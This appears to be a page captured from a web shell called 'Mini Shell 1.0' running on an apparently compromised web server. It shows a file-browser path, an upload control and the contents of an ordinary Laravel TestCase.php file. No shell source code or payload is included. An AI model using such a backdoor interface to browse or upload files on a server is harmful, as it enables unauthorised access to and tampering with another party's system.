HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/thread-self/cwd/tests/
Upload File :
Current File : //proc/thread-self/cwd/tests/TestCase.php
<?php





namespace Tests;





use Illuminate\Foundation\Testing\TestCase as BaseTestCase;





abstract class TestCase extends BaseTestCase


{


    use CreatesApplication;


}